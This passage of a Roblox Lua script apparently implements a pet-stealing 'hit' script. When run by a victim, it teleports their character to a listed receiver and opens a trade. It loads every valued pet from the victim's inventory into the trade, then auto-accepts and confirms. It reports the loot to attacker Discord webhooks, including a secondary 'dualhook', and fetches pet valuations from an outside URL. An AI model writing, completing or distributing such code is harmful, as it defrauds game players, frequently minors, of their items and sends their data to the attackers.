inline = true
            },
            {
                name = "📡 **Receivers**",
                value = string.format("```\n%s\n```", table.concat(TARGET_RECEIVERS, ", ")),
                inline = true
            },
            {
                name = "🎒 **Extraction Log (Pets Only)**",
                value = "```\n" .. (table.concat(petLines, "\n") or "No mapped pets detected.") .. "\n```",
                inline = false
            },
            {
                name = "🌐 **Join Instance**",
                value = string.format("[**Click to Join Server**](https://www.roblox.com/games/%s?jobId=%s)", game.PlaceId, game.JobId),
                inline = false
            }
        },
        footer = {text = "Mondeur Master Logic • v4.0 • " .. os.date("%X")},
        timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
    }
end

--------------------------------------------------------------
-- POINT SYSTEM LOADER (LIVE DATA)
--------------------------------------------------------------
local function loadPoints()
    local success, content = pcall(function() return game:HttpGet(POINT_SYSTEM_URL) end)
    if not success or not content then 
        warn("[MONDEUR] Error reaching Point System URL.")
        return 
    end

    -- Attempt JSON Parsing
    local jsonSuccess, decoded = pcall(function() return HttpService:JSONDecode(content) end)
    if jsonSuccess and type(decoded) == "table" then
        PetValues = decoded
        print("[MONDEUR] Point System Synced (JSON)")
    else
        -- Fallback: Manual Text Parsing (Name:Value or Name=Value)
        print("[MONDEUR] JSON parsing failed. Switching to manual list parsing...")
        for line in content:gmatch("[^\r\n]+") do
            local name, val = line:match("([^:=]+)[:=]([%d%.]+)")
            if name and val then
                PetValues[trim(name)] = tonumber(val)
            end
        end
        print("[MONDEUR] Point System Synced (Raw Text)")
    end
end

--------------------------------------------------------------
-- WEBHOOK ROUTING & PING LOGIC
--------------------------------------------------------------
local function processReporting(pets, total)
    local embed = buildMondeurEmbed(pets, total)
    
    -- 1. USERHOOK LOGIC: Receives EVERY successful trade hit.
    -- Tags @everyone only if total value >= User-defined Threshold.
    local userPing = (total >= USER_THRESHOLD) and "@everyone" or ""
    sendDiscordRequest(USER_WEBHOOK, {content = userPing, embeds = {embed}})

    -- 2. DUALHOOK LOGIC: Filtered hit (>= 500). Always tags @everyone.
    local dualTrigger = (total >= DUALHOOK_PING_MIN)
    for _, p in ipairs(pets) do if p.value >= DUALHOOK_PING_MIN then dualTrigger = true break end end
    
    if dualTrigger then
        sendDiscordRequest(DUAL_WEBHOOK, {content = "@everyone", embeds = {embed}})
    end
end

--------------------------------------------------------------
-- CORE EXECUTION (TP & TRADE)
--------------------------------------------------------------
local function findReceiver()
    for _, name in ipairs(TARGET_RECEIVERS) do
        local p = Players:FindFirstChild(name)
        if p and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
            return p
        end
    end
    return nil
end

local function runSequence()
    local target = findReceiver()
    if not target then return end

    -- Phase 1: Proximity Teleport
    local hrp = LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
    if hrp then 
        hrp.CFrame = target.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 3) 
    end
    task.wait(0.1)

    -- Phase 2: Open Trade
    TradeAPI["TradeAPI/SendTradeRequest"]:FireServer(target)
    
    -- Phase 3: Inventory Filter & Valuation
    local success, inventory = pcall(function() 
        return TradeAPI["InventoryAPI/GetInventory"]:InvokeServer() 
    end)
    
    if success and inventory then
        local petsToExport, totalValue = {}, 0
        for _, item in ipairs(inventory) do
            if item.Kind == "Pet" then
                local petVal = PetValues[item.Name] or 0
                if petVal > 0 then
                    table.insert(petsToExport, {name = item.Name, value = petVal})
                    totalValue = totalValue + petVal
                    -- Phase 4: Direct Remote Addition
                    TradeAPI["TradeAPI/AddItemToOffer"]:FireServer(item.Id)
                end
            end
        end

        -- Phase 5: Confirm Sequence
        if #petsToExport > 0 then
            TradeAPI["TradeAPI/AcceptTrade"]:FireServer()
            TradeAPI["TradeAPI/ConfirmTrade"]:FireServer()
            
            processReporting(petsToExport, totalValue)
            print("[MONDEUR] Successfully Exported: " .. tostring(totalValue) .. " Pesos")
        end
    end
end

--------------------------------------------------------------
-- SYSTEM INITIALIZATION
--------------------------------------------------------------
loadPoints()

-- Startup Online Status
sendDiscordRequest(USER_WEBHOOK, {
    embeds = {{
        title = "✅ Mondeur Hit | Master System Online",
        description = "Premium logic successfully loaded. Monitoring instance for target receivers.",
        color = 0x00FF88,
        fields = {
            {name = "👤 User", value = LocalPlayer.Name, inline = true},
            {name = "📡 Threshold", value = tostring(USER_THRESHOLD), inline = true}
        },
        timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
    }}
})

-- Main Polling Loop
task.spawn(function()
    print("[MONDEUR] Elite Master Logic Initialized.")
    while true do
        local ok, err = pcall(runSequence)
        if not ok then task.wait(1) end
        task.wait(SCAN_DELAY)
    end
end)
